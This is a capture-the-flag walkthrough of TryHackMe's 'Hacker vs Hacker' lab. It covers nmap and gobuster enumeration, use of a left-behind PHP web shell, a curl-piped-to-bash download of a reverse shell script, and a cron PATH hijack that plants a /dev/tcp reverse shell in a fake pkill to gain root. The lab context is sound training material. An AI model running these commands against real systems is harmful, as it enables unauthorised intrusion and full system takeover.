TryHackMe CTF Hacker vs Hacker
Zakwan Abid
Senior Cyber Security Consultant | OSCP l eCPPT | CEH | Penetration Tester | IT/ CS Auditor | GRC Specialist
Hello guys back again with another walkthrough this time we are going to get our hands dirty on CTF (Hacker vs. Hacker) from TryHackMe.
Enumeration through NMAP:
nmap -sV -sC -Pn -A 10.10.168.53 -o nmap
We have 2 ports open
Now let's check website
Now got to the page source of this website and check the source code if we find anything malicious
Here we have find the /cvs directory, check this directory
Now go back to the home page of this website
Scrolling down we get a CV upload functionality.
We always know that if a website has file upload capability many time they are set up correctly but by chance sometimes you might be lucky and discover a misconfigured website.
Next I decided to begin testing file upload functionality to see if i could find any security misconfiguration that it might have. I decided to begin by just uploading a plain text file.
I create a simple text file now I'm uploading it to the website
After uploading file on to the website i got
Now check the page source what we get in the back-end
Looking at the screenshot above we notice that there is some source code disclosure. The application is using strpos() on file extension to determine whether an uploaded file is a pdf or not.
Enumeration Through Gobuster:
Now I start directory searching?using go buster
Gobuster is a tool used to brute-force URIs including directories and files as well as DNS subdomains
gobuster dir -u https://10.10.168.53/cvs/ -w /home/zkwan/Git/SecLists/Discovery/Web-Content/common.txt?-x .pdf.php -t 50
From gibuster result here we got /shell.pdf.php
Now check it on website
here we got access to the /shell.pdf.php
Basic PHP Enumeration
Now I check basic PHP enumeration using cmd the following
/shell.pdf.php?cmd=id
So it is vulnerable to command injection. Now lets get a reverse shell.
领英推荐
Initial Foothold:
Create Reverse Shell
Here the above IP is from my VPN. Copy this?PHP one liner and create ka file with this code.
Now start the python webserver to upload this reverse shell to the website
Now start nc listener on another tab
Goto website and type the folowing cmd in the URL
cmd=curl https://10.8.78.190:8080/revshell.sh | bash
Check you nc listener there you will get Reverse shell
As you can see in the above picture i'm able to get the user flag
Privilege Escalation:
I went looking through the lachlan directory and noticed the .bash_history
Upon enumerating that, I found a few commands had been run:
The password for user lachlan was changed with echo -e command.
Looking at /etc/cron.d/persistence, we can maybe get backup.sh to run as root every minute.
Looking at the cronjob file we notice a vulnerability that leads to remote code execution. The PATH variable is used to determine where exactly the binaries are going to be called from
The program will first go to /home/lachlan/bin to search for the binaries followed by /bin and lastly /usr/bin
Since we have read and write privileges on /home/lachlan/bin we can just drop our binary and wherever root runs the cronjob he’ll execute our binary instead of the real binary. But Looking the the cronjob again we notice that some binaries are using absolute paths meaning they cannot be hijacked but pkill is using a relative path
we can just login to the system and upload a malicious binary to /home/lachlan/bin which when executed will give us a root shell.
Now login with ssh
But the SSH session keeps getting terminated after a few seconds this is due to a cronjob that’s running as root
Now exit this session and start netcat listener on port 4545:
Now login again via ssh
After login?executed the below command before being kicked out by the cronjobn
echo "bash -c 'bash -i >& /dev/tcp/10.8.78.190/4545 0>&1'" > bin/pkill ; chmod +x bin/pkill
Check you netcat listener there you will get reverse shell as root
That's all guys the CTF is done. We have successfully capture two flags one is from user access and other is from root access.
I hope you enjoyed the walkthrough if so like for me down below and follow me as well so that you won’t miss any upcoming future walkthroughs.
Enterprise Architect, CCSP | TOGAF | CHFI | CEH | DevSecOps
2 年Stay committed. ??